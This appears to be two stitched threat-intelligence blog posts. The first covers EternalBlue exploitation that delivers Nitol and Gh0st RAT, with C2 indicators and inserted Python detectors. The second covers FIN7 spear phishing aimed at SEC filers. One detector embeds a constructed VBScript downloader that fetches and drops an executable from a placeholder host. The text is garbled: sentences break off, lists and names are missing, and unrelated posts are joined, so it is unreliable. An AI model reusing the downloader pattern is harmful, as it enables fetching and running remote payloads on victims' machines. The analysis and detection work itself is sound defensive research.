The “EternalBlue” exploit (MS17-010)
was initially used by WannaCry ransomware and Adylkuzz cryptocurrency
miner. Now more threat actors are leveraging the vulnerability in Microsoft
Server Message Block (SMB) protocol – this time to distribute
Backdoor.Nitol and Trojan Gh0st RAT.
FireEye Dynamic Threat Intelligence (DTI) has historically observed
similar payloads delivered via exploitation of CVE-2014-6332
vulnerability as well as in some email spam campaigns using powershell
commands. Specifically, Backdoor.Nitol has also been linked to
campaigns involving a remote code execution vulnerability using the
ADODB.Stream ActiveX Object that affects older versions of Internet
Explorer. Both payloads have previously been involved in targeted cyber-attacks
against the aerospace and defense industry.
We observed lab machines vulnerable to the SMB exploit being attacked by
a threat actor using the EternalBlue exploit to gain shell access to
Figure 1 shows an EternalBlue exploitation attempt.
Figure 1. Network traffic showing EternalBlue
The initial exploit technique used at the SMB
level is similar to what we have seen in WannaCry
campaigns; however, once a machine is successfully infected, this
particular attack opens a shell to write instructions into a VBScript
file and then executes it to fetch the payload from another server.
We have observed the same EternalBlue and VBScript combination used
to distribute Gh0st RAT in Singapore, as well as Backdoor.Nitol being
delivered in the South Asia region.
Figure 2. VBScript instructions in ‘1.vbs’
The full VBScript instructions can be seen in Figure 2. The attacker
echoes instructions into a new ‘1.vbs’ file to be executed later.
These instructions fetch the payload ‘taskmgr.exe’ from another
server in a synchronous call (as indicated by the second parameter
‘0’). The script then creates an ADODB.Stream ActiveX object, which
reads the file returned by the server and writes the binary data
into a stream. Mode ‘3’ is used for read/write
permissions, while type ‘1’ indicates that the stream holds binary data.
Thereafter, it saves the binary stream to a location under “c:/” with
option ‘2’ in order to overwrite any existing file with the same name at that location.
Later, we see that ‘1.vbs’ is executed through the command-line version
of the Windows Script Host, which then deletes the .vbs file. Once the
executable is fetched and saved, the attacker uses a shell to launch
the backdoor from the saved location.
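As an added example (not from the original post), a small rule-based scanner that scores a script body for the fetch-and-drop chain described above: a synchronous XMLHTTP request, an ADODB.Stream opened with Mode 3 and Type 1, and SaveToFile with the overwrite option 2. The embedded VBScript is a constructed sample with a placeholder host, and the rule weights and threshold are assumptions to tune against your own telemetry.

```python
import re

# Constructed VBScript fragment mirroring the downloader pattern the post
# describes (synchronous XMLHTTP fetch, ADODB.Stream with Mode 3 / Type 1,
# SaveToFile with option 2). The host name is a placeholder, not an indicator.
SAMPLE_VBS = '''
Set x = CreateObject("Microsoft.XMLHTTP")
x.Open "GET", "http://host.invalid/taskmgr.exe", 0
x.Send
Set s = CreateObject("ADODB.Stream")
s.Mode = 3
s.Type = 1
s.Open
s.Write x.responseBody
s.SaveToFile "c:\\taskmgr.exe", 2
'''

# (rule name, regex, weight). Patterns are case-insensitive because VBScript is.
RULES = [
    ("xmlhttp_object", r'CreateObject\s*\(\s*"(?:Microsoft|MSXML2)\.(?:Server)?XMLHTTP', 1),
    ("synchronous_open", r'\.Open\s+"GET"\s*,\s*"[^"]*"\s*,\s*(?:0|False)\b', 1),
    ("adodb_stream", r'CreateObject\s*\(\s*"ADODB\.Stream"', 1),
    ("stream_readwrite", r'\.Mode\s*=\s*3\b', 1),
    ("stream_binary", r'\.Type\s*=\s*1\b', 1),
    ("savetofile_overwrite", r'\.SaveToFile\s+"[^"]*"\s*,\s*2\b', 2),
    ("drops_executable", r'\.SaveToFile\s+"[^"]*\.(?:exe|dll|scr)"', 2),
]

def score_vbscript(text: str):
    """Return (score, matched rule names) for a script body."""
    hits = [name for name, pat, _ in RULES if re.search(pat, text, re.I)]
    score = sum(w for name, _, w in RULES if name in hits)
    return score, hits

def is_download_and_execute(text: str, threshold: int = 6) -> bool:
    """True when enough of the fetch-and-drop chain is present to alert on."""
    return score_vbscript(text)[0] >= threshold
```

The same rules can be run over process command lines, since the attacker writes the script line by line with `echo`, so each fragment appears in the shell history before the .vbs file exists.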
Figure 3 shows Backdoor.Nitol being downloaded and infecting the machine.
Figure 3. Network traffic showing Backdoor.Nitol download
The command and control (C2) for the Backdoor.Nitol sample is
hackqz.f3322[.]org (184.108.40.206). See Figure 4.
Figure 4. Backdoor.Nitol C2 communication
The other malware that we’ve observed being deployed in this manner
is Gh0st RAT. The observed dropper downloads the Gh0st RAT binary from
beiyeye.401hk[.]com (Figure 5).
Figure 5. Gh0st RAT C2 communication
The first five bytes in the header of the Gh0st RAT traffic are an
indication of the Gh0st variant used. Historically we have seen
widespread usage of variants employing the ‘cb1st’ magic
header against the Education, Energy/Utilities, Manufacturing,
Services/Consulting, and Telecom industries. For more information on
this and other widely used variants of Gh0st RAT, please review GH0ST
in the Machine: GH0ST RAT Remains Active in Financial Services
Sector available on our subscription MySight portal.
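As an added example (not from the original post), a parser that identifies a Gh0st variant from the five-byte magic at the start of a captured packet and validates the rest of the header before alerting. The layout after the magic (little-endian total length, little-endian uncompressed length, zlib-compressed body) is assumed from public analyses of the leaked Gh0st source, not stated on the page; the packets below are constructed samples.

```python
import struct
import zlib

# Five-byte magic tags by variant: 'Gh0st' is the original family tag, 'cb1st'
# the variant named in the post. Extend this set from your own telemetry.
KNOWN_MAGIC = {b"Gh0st", b"cb1st"}
HDR_LEN = 13  # magic(5) + total_len(4) + original_len(4)

def build_packet(magic: bytes, body: bytes) -> bytes:
    """Build a constructed packet in the classic Gh0st layout (assumed from
    public analyses of the leaked source: magic, little-endian uint32 total
    length, little-endian uint32 uncompressed length, zlib body)."""
    comp = zlib.compress(body)
    return magic + struct.pack("<II", HDR_LEN + len(comp), len(body)) + comp

def parse_gh0st(pkt: bytes):
    """Return (variant tag, decompressed body) for a packet that matches the
    Gh0st layout and a known magic; None for anything else."""
    if len(pkt) < HDR_LEN:
        return None
    magic = pkt[:5]
    if magic not in KNOWN_MAGIC:
        return None
    total, orig = struct.unpack("<II", pkt[5:HDR_LEN])
    if total != len(pkt):            # length field must cover the whole packet
        return None
    try:
        body = zlib.decompress(pkt[HDR_LEN:])
    except zlib.error:               # magic collision with non-Gh0st data
        return None
    if len(body) != orig:
        return None
    return magic.decode("ascii"), body

# Constructed sample traffic: one variant packet and one unrelated HTTP reply.
SAMPLE_GH0ST = build_packet(b"cb1st", b"\x01constructed-heartbeat")
SAMPLE_HTTP = b"HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n"
```

Checking the length fields and that the body inflates keeps a bare five-byte string match from firing on unrelated traffic that happens to start with the same bytes.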
The Gh0st RAT sample observed in this attack, as well as other
associated samples identified by FireEye, are all signed with a common
digital certificate purporting to be from 北京研创达科技有限公司 (Beijing
Institute of Science and Technology Co., Ltd). Stolen or
illegitimately purchased code signing certificates are increasingly
used to lend legitimacy to malware. See the appendix for full details
on the observed code signing certificate.
The addition of the EternalBlue exploit to Metasploit has made it
easy for threat actors to exploit these vulnerabilities. In the coming
weeks and months, we expect to see more attackers leveraging these
vulnerabilities and to spread such infections with different payloads.
It is critical that Microsoft Windows users patch their machines and
update to the latest software versions as soon as possible.
FireEye Labs authors would like to thank Shahzad Ahmad and Kean
Siong Tan for their contributions in this discovery.
220.127.116.11:45988 / taskmgr.exe (Nitol)
beiyeye.401hk[.]com:1541 / systemUpdate.exe (Gh0st)
In late February 2017, FireEye as a Service (FaaS) identified a spear
phishing campaign that appeared to be targeting personnel involved
with United States Securities and Exchange Commission (SEC) filings at
various organizations. Based on multiple identified overlaps in
infrastructure and the use of similar tools, tactics, and procedures
(TTPs), we have high confidence that this campaign is associated with
the financially motivated threat group tracked by FireEye as FIN7.
FIN7 is a financially motivated intrusion set that selectively
targets victims and uses spear phishing to distribute its malware. We
have observed FIN7 attempt to compromise diverse organizations for
malicious operations – usually involving the deployment of
point-of-sale malware – primarily against the retail and hospitality industries.
All of the observed intended recipients of the spear phishing
campaign appeared to be involved with SEC filings for their respective
organizations. Many of the recipients were even listed in their
company’s SEC filings. The sender email address was spoofed as EDGAR
<firstname.lastname@example.org> and the attachment was named
d04b6410dddee19adec75f597c52e386). An example email is shown in
Figure 1: Example of a phishing email sent during this campaign
We have observed the following TTPs with this campaign:
Thus far, we have directly identified 11 targeted organizations in
the following sectors:
All these organizations are based in the United States, and many
have international presences. As the SEC is a U.S. regulatory
organization, we would expect recipients of these spear phishing
attempts to either work for U.S.-based organizations or be U.S.-based
representatives of organizations located elsewhere. However, it is
possible that the attackers could perform similar activity mimicking
other regulatory organizations in other countries.
We have not yet identified FIN7’s ultimate goal in this campaign, as
we have either blocked the delivery of the malicious emails or our
FaaS team detected and contained the attack early enough in the
lifecycle before we observed any data targeting or theft. However, we
surmise FIN7 can profit from compromised organizations in several
ways. If the attackers are attempting to compromise persons involved
in SEC filings due to their information access, they may ultimately be
pursuing securities fraud or other investment abuse. Alternatively, if
they are tailoring their social engineering to these individuals, but
have other goals once they have established a foothold, they may
intend to pursue one of many other fraud types.
Previous FIN7 operations deployed multiple point-of-sale malware
families for the purpose of collecting and exfiltrating sensitive
financial data. The use of the CARBANAK malware in FIN7 operations
also provides limited evidence that these campaigns are linked to
previously observed CARBANAK operations leading to fraudulent banking
transactions, ATM compromise, and other monetization schemes.
FireEye implemented a Community Protection Event – FaaS, Mandiant,
Intelligence, and Products – to secure all clients affected by this
campaign. In this instance, an incident detected by FaaS led to the
deployment of additional detections by the FireEye Labs team after
FireEye Labs Advanced Reverse Engineering quickly analyzed the
malware. Detections were then quickly deployed to the suite of FireEye products.
The FireEye iSIGHT Intelligence MySIGHT Portal contains additional
information based on our investigations of a variety of topics
discussed in this post, including FIN7 and the POWERSOURCE and
TEXTMATE malware.